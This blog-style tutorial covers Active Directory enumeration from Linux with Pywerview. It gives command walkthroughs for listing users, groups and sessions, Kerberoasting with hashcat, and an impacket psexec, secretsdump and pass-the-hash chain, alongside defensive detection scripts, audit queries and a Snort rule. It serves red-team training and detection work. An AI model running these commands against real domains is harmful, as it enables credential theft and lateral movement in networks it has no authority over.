
Introduction:
Active Directory (AD) remains the crown jewel of enterprise authentication, and attackers increasingly target it from non-Windows platforms to evade detection. Pywerview, a Python port of the infamous PowerView, empowers red teamers and penetration testers to enumerate domain users, groups, computers, privileges, and logged-in sessions directly from a Linux machine—no PowerShell, no Windows agent required.
Learning Objectives:
- Install and configure Pywerview alongside its Impacket dependencies on a Linux attack host.
- Execute key AD enumeration commands to map domain users, groups, computers, and access rights.
- Apply post‑exploitation techniques such as SPN hunting and logged‑in session discovery for lateral movement planning.
You Should Know:
1. Installing Pywerview and Core Dependencies
Pywerview relies on Impacket for SMB/RPC communication and Python’s LDAP libraries. Follow this step‑by‑step guide to set up your Linux environment.
Step‑by‑step guide:
```shell
# Update system and install Python3 & pip
sudo apt update && sudo apt install python3 python3-pip git -y
# Clone Pywerview repository
git clone https://github.com/the-useless-one/pywerview.git
cd pywerview
# Install required Python packages
pip3 install impacket ldap3 dnspython pycryptodome
# Optional: Create a virtual environment
python3 -m venv pywerview-env
source pywerview-env/bin/activate
pip3 install -r requirements.txt   # if present, else manual install as above
```
Verification: Run `python3 pywerview.py -h` to see the help menu. Ensure Impacket’s `getTGT.py` or `secretsdump.py` are available in your PATH for advanced integration.
2. Enumerating Domain Users and Groups
Once Pywerview is installed, you can query the domain controller for all user objects and group memberships. This requires domain credentials (cleartext or NTLM hash) and the target DC’s IP or hostname.
Step‑by‑step guide:
```shell
# List all domain users (requires valid credentials)
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user
# Filter specific user attributes (e.g., displayName, title)
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user -attr displayName,title,mail
# Enumerate all domain groups
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group
# Get members of the "Domain Admins" group
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group-member -groupname "Domain Admins"
```
Windows equivalent (for defenders): Use `net user /domain` or `Get-ADGroupMember -Identity "Domain Admins"` to audit the same information.
3. Discovering Computers and Domain Controllers
Mapping the AD infrastructure is critical for attack path visualization. Pywerview can list all computer objects and identify domain controllers.
Step‑by‑step guide:
```shell
# List all computers in the domain
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-computer
# Show only operating system and DNS hostname
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-computer -attr name,operatingsystem,dNSHostName
# Find the primary domain controller (PDC) role holder
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-domain-controller
```
Defender tip: Monitor event ID 4662 (Directory Service Access) for unusual LDAP queries from non‑domain joined IPs—Linux attack hosts will often leave this trail.
4. Finding Logged‑in Users and Active Sessions
Identifying where high‑value users are logged in enables lateral movement. Pywerview uses the NetSessionEnum RPC call to retrieve session information.
Step‑by‑step guide:
```shell
# List all active sessions on a specific server (e.g., file server)
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-net-session -computer fileserver.victim.local
# Enumerate sessions on all domain computers (can be noisy)
for ip in $(nmap -sn 192.168.1.0/24 | grep "Nmap scan" | cut -d " " -f5); do
  python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-net-session -computer $ip
done
```
Mitigation: Restrict `NetSessionEnum` access via hardened RPC filters and deploy Windows Defender Credential Guard to protect logged‑on credentials.
5. Hunting Privileged Accounts and SPNs (Kerberoasting)
Service Principal Names (SPNs) linked to high‑privileged accounts are prime Kerberoasting targets. Pywerview can extract SPNs from any Linux system.
Step‑by‑step guide:
```shell
# Get all users with SPNs set (Kerberoastable accounts)
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-user-spns
# Request a TGS for a specific SPN (requires Impacket's GetUserSPNs)
impacket-GetUserSPNs victim.local/john.doe:Password123 -dc-ip 192.168.1.10 -request
# Crack the hash offline using John or Hashcat
hashcat -m 13100 kerberoast-hash.txt rockyou.txt
```
Why this matters: Non‑Windows attackers often bypass PowerShell logging. Pywerview’s Kerberoasting leaves different event IDs (4769) but blends with legitimate Linux admin traffic.
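The 4769 trail mentioned above is easier to work with once it is reduced to a pattern rather than single events: hashcat mode 13100 on this page cracks RC4 (etype 0x17) service tickets, so a Kerberoasting run typically shows up as one account requesting RC4 tickets for several distinct service accounts within seconds. The following detection logic is an added example for this article, not Pywerview or Impacket code; the 4769 records are constructed, using field names from the 4769 event schema (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status), and the five-minute window and three-service threshold are assumptions to tune against your own baseline.

```python
"""Flag Kerberoasting-style bursts in Windows Security event 4769 records.

Added example for this article; not Pywerview or Impacket code. The records
are constructed, with field names taken from the 4769 event schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType of RC4 tickets (the input to hashcat mode 13100)

# Constructed sample events: one account requesting four RC4 service tickets
# within seconds, plus ordinary AES (0x12) and single-ticket traffic.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "TargetUserName": "john.doe@VICTIM.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "john.doe@VICTIM.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "john.doe@VICTIM.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"time": "2024-05-01T09:00:03", "TargetUserName": "john.doe@VICTIM.LOCAL",
     "ServiceName": "svc_sharepoint", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},
    {"time": "2024-05-01T09:00:05", "TargetUserName": "john.doe@VICTIM.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.50", "Status": "0x0"},   # computer account: ignored
    {"time": "2024-05-01T09:01:10", "TargetUserName": "alice@VICTIM.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:192.168.1.21", "Status": "0x0"},   # AES ticket: ignored
    {"time": "2024-05-01T09:02:00", "TargetUserName": "bob@VICTIM.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.1.22", "Status": "0x0"},   # single RC4 ticket: below threshold
    {"time": "2024-05-01T09:02:30", "TargetUserName": "WS01$@VICTIM.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:192.168.1.30", "Status": "0x0"},
]


def is_roast_candidate(ev):
    """Successful RC4 ticket for a user service account (not a computer account or krbtgt)."""
    if ev["Status"] != "0x0":
        return False
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return int(ev["TicketEncryptionType"], 16) == RC4_HMAC


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Return one alert per requester that obtained RC4 tickets for at least
    min_services distinct service accounts inside any sliding window."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(ev)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        for i, start in enumerate(evs):
            t0 = datetime.fromisoformat(start["time"])
            in_window = [e for e in evs[i:]
                         if datetime.fromisoformat(e["time"]) - t0 <= window]
            services = sorted({e["ServiceName"] for e in in_window})
            if len(services) >= min_services:
                alerts.append({"user": user,
                               "ip": start["IpAddress"].replace("::ffff:", ""),
                               "first_seen": start["time"],
                               "services": services})
                break  # one alert per user is enough; do not re-fire on every sub-window
    return alerts


if __name__ == "__main__":
    for a in find_kerberoast_bursts(SAMPLE_4769):
        print(f"{a['first_seen']} {a['user']} from {a['ip']} "
              f"requested RC4 tickets for {', '.join(a['services'])}")
```

Computer accounts and krbtgt are excluded because their tickets are not the Kerberoasting target, and AES tickets are skipped because they are not what mode 13100 consumes; if your service accounts still default to RC4, the more durable fix is to move them to AES so that a burst of 0x17 requests becomes rare enough to alert on directly.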
6. Leveraging Pywerview for Post‑Exploitation with Impacket
Combine Pywerview’s enumeration with Impacket’s execution tools (psexec, wmiexec, atexec) for a full Linux‑based attack chain.
Step‑by‑step guide:
```shell
# Step 1: Enumerate domain admins
python3 pywerview.py -d victim.local -u john.doe -p Password123 --dc-ip 192.168.1.10 get-group-member -groupname "Domain Admins"
# Step 2: Use Impacket psexec to execute commands on a target machine
impacket-psexec victim.local/administrator:[email protected]
# Step 3: Dump SAM hashes from the compromised server
impacket-secretsdump victim.local/administrator:[email protected]
# Step 4: Pass-the-hash to other systems using Pywerview's -hashes option
python3 pywerview.py -d victim.local -u administrator --hashes aad3b435b51404eeaad3b435b51404ee:hash123 --dc-ip 192.168.1.10 get-user
```
Lab recommendation: Set up a virtual lab with Samba AD DC or Windows Server to practice these steps legally.
7. Defensive Measures: Detecting Pywerview Abuse
Blue teams can detect Pywerview by monitoring for anomalous LDAP query patterns and RPC calls originating from Linux user agents.
Step‑by‑step guide for defenders:
Windows: Enable LDAP logging via Group Policy
Computer Config → Policies → Admin Templates → System → Directory Services → "LDAP server logging" = Enable
Query Windows event log for suspicious LDAP queries (Event ID 1644)
```powershell
# -like needs wildcards; without them the filter only matches a message that is exactly "searchScope=2"
Get-WinEvent -LogName "Directory Service" | Where-Object { $_.Id -eq 1644 -and $_.Message -like "*searchScope=2*" }
```
Linux detection: Monitor for unusual Python processes making LDAP connections
```shell
# Records every outbound connect() syscall under the key LDAP_OUTBOUND; review with: ausearch -k LDAP_OUTBOUND
sudo auditctl -a always,exit -F arch=b64 -S connect -k LDAP_OUTBOUND
```
Network rule example (Snort/Suricata):
```
alert tcp $HOME_NET any -> $DC_SERVER 389 (msg:"Pywerview LDAP Enumeration"; content:"|60 84|"; depth:2; flow:to_server; sid:1000001;)
```
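The defender tip in section 3 (watch for directory access from non-domain-joined IPs) and the 1644 query above both reduce to scoring each LDAP search on a few signals: who sent it, whether it is a subtree search from the domain root, whether the filter pulls a whole object class, and how many entries came back. The following scorer is an added example for this article, not Pywerview code; the records are constructed in the shape of the fields a Directory Service event 1644 carries (client address, starting node, filter, search scope, entries returned), and it assumes those events are already being collected (they only appear once the DC's search-logging thresholds are configured). The domain-joined allow-list and the thresholds are hypothetical values.

```python
"""Score LDAP search records (event 1644 style) for bulk-enumeration behaviour.

Added example for this article, not Pywerview code. Records and the
domain-joined allow-list are constructed.
"""
import re
from collections import defaultdict

# Hypothetical set of domain-joined hosts; in practice export it from AD or a CMDB.
DOMAIN_JOINED = {"192.168.1.10", "192.168.1.20", "192.168.1.21"}

# Filters that pull a whole object class rather than a single object.
ENUM_FILTERS = [re.compile(p, re.I) for p in (
    r"\(objectclass=user\)",
    r"\(objectcategory=(computer|group|person)\)",
    r"\(samaccounttype=805306368\)",
    r"\(serviceprincipalname=\*\)",
)]

# Constructed sample records. Scope: 0 = base, 1 = one level, 2 = subtree.
SAMPLE_1644 = [
    {"client": "192.168.1.50:49812", "base": "DC=victim,DC=local", "scope": 2,
     "filter": "(&(objectClass=user)(!(objectClass=computer)))", "returned": 1342},
    {"client": "192.168.1.50:49815", "base": "DC=victim,DC=local", "scope": 2,
     "filter": "(servicePrincipalName=*)", "returned": 37},
    {"client": "192.168.1.20:51000", "base": "OU=Sales,DC=victim,DC=local", "scope": 2,
     "filter": "(&(objectClass=user)(department=Sales))", "returned": 120},
    {"client": "192.168.1.21:51002", "base": "CN=john.doe,OU=Users,DC=victim,DC=local",
     "scope": 0, "filter": "(objectClass=*)", "returned": 1},
    {"client": "192.168.1.60:40001", "base": "OU=Printers,DC=victim,DC=local", "scope": 1,
     "filter": "(objectClass=printQueue)", "returned": 4},
]


def client_ip(client):
    """Strip the source port from an 'ip:port' client field (IPv4 form, as in the samples)."""
    return client.rsplit(":", 1)[0]


def score_record(rec, domain_joined=DOMAIN_JOINED, volume_threshold=500):
    """Return (client_ip, [reasons]) for one search record."""
    reasons = []
    ip = client_ip(rec["client"])
    if ip not in domain_joined:
        reasons.append("non-domain-joined client")
    if rec["scope"] == 2 and rec["base"].lower().startswith("dc="):
        reasons.append("subtree search from domain root")
    if any(p.search(rec["filter"]) for p in ENUM_FILTERS):
        reasons.append("bulk-enumeration filter")
    if rec["returned"] >= volume_threshold:
        reasons.append(f"{rec['returned']} entries returned")
    return ip, reasons


def find_enumerators(records, min_reasons=3):
    """Group records by client and keep those scoring at least min_reasons signals."""
    hits = defaultdict(list)
    for rec in records:
        ip, reasons = score_record(rec)
        if len(reasons) >= min_reasons:
            hits[ip].append(reasons)
    return dict(hits)


if __name__ == "__main__":
    for ip, findings in find_enumerators(SAMPLE_1644).items():
        for reasons in findings:
            print(f"{ip}: {'; '.join(reasons)}")
```

The allow-list is deliberately only one signal of four, so a domain-joined host that runs a full subtree enumeration still scores; the scoped Sales query from 192.168.1.20 and the single-object lookup from 192.168.1.21 fall below the threshold, which is the shape of the legitimate traffic you want to keep quiet.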
What Undercode Says:
- Cross‑platform weaponization – Pywerview proves that AD attacks no longer require Windows; Linux red teams can fully map domains using only Python and RPC.
- Defensive blind spots – Most EDRs focus on PowerShell and Windows executables; Pywerview’s Impacket traffic often bypasses default alerts unless LDAP is deeply monitored.
- Mitigation is possible – Enforce LDAP signing, channel binding, and monitor for event ID 1644 with high‑volume search scopes to catch enumeration in real time.
Prediction:
As hybrid and Linux‑only workstations proliferate, tools like Pywerview will become standard in both red and purple team arsenals. Expect Microsoft to harden RPC and LDAP defaults (e.g., mandatory signing) within two years, pushing attackers toward more sophisticated API‑based enumeration via Graph or AD CS misconfigurations. Meanwhile, detection engineering must evolve to treat any LDAP search from a non‑domain machine as suspicious—turning Pywerview’s strength into its signature.
Reported By: Active Directory – Hackers Feeds